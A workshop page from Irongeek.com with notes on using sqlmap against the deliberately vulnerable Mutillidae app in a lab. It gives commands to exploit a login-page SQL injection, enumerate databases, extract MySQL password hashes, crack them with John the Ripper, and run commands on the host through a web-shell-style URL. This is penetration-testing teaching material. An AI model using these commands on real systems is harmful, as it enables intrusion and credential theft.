| |||||
| |||||
Search Irongeek.com:
Help Irongeek.com pay for bandwidth and research equipment: |
Basics of using sqlmap - ISSA
Kentuckiana workshop 8 - Jeremy Druin This is the 8th in a line of classes Jeremy Druin will
be giving on pen-testing and web app security featuring
Mutillidae (or other tools) for the Kentuckiana
ISSA. This one covers SQLMap. Details: Video Tutorials:
www.youtube.com/user/webpwnized
Recorded at the ISSA Kentuckiana February 2013 Workshop, this video
review the use of sqlmap; an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection,
determine the backend database type, enumerate the database account,
databases, schema, tables, columns and password hashes, then use the
database to compromise the windows host. Dumping data, arguably the primary
use of sqlmap, is covered only briefly since there is large amounts of
documentation on this feature already. Environment The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a
Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle
VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is
installed. Mutillidae may also be installed on WAMPP or LAMP stacks
including being able to be installed on Linux. Using two hosts is not
neccesary to recreate the lab exercise. All of the items can be reproduced
on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae
files into the C:\xampp\htdocs\ directory, then clicking the "Set up
database" button in Mutillidae. Mutillidae has a deliberately vulnerable
login page against which the sql injection was carried out. Notes from Presentation Please find notes from the talk below which can be used to follow along
with the video. --help Help
-------------------------------------------------- ./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php"
--data="username=asdf&password=asdf&login-php-submit-button=Login" --banner
-------------------------------------------------- URL:
http://192.168.56.102/mutillidae/index.php?page=login.php Request: POST /mutillidae/index.php?page=login.php
HTTP/1.1 username=asdf&password=asdf&login-php-submit-button=Login
-------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request
<options>
-------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request
<options> --banner web server operating system: Windows --fingerprint web server operating system: Windows --current-user Retrieve DBMS current
user current user: 'root@localhost' --users Enumerate DBMS users database management system users --dbs Enumerate DBMS
databases available databases[10]:
--------------------------------------------------------------------------------
-------------------- --tables Enumerate DBMS
database tables
-------------------------------------------------- --dump Dump DBMS database
table entries
-------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request
-D mysql -T user --columns select column_name from
information_schema.columns where table_name = 'user' [42]:
-------------------------------------------------- SELECT * FROM accounts WHERE username='' AND
password=''' ./sqlmap.py -r ~/engagements/sqlmap/login.php.request
--prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload
prefix string
-------------------------------------------------- select User, Password from mysql.user versus ./sqlmap.py -r ~/engagements/sqlmap/login.php.request
-D mysql --sql-query="select User, Password from mysql.user order by User
desc" select User, Password from mysql.user order
by User desc select User, Password, Host,
authentication_string from mysql.user order by User desc [9]:
-------------------------------------------------- John the Ripper Command Line /pentest/passwords/john/john
--format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
-------------------------------------------------- View transaction: tcpdump -i eth1 -vvv -X sc query state= all http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101
-------------------------------------------------- Installing Py-MySQL Dependency git clone
https://github.com/petehunt/PyMySQL/ ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10
15 most recent posts on Irongeek.com:
|
If you would like to republish one of the articles from this site on your
webpage or print journal please contact IronGeek.
Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast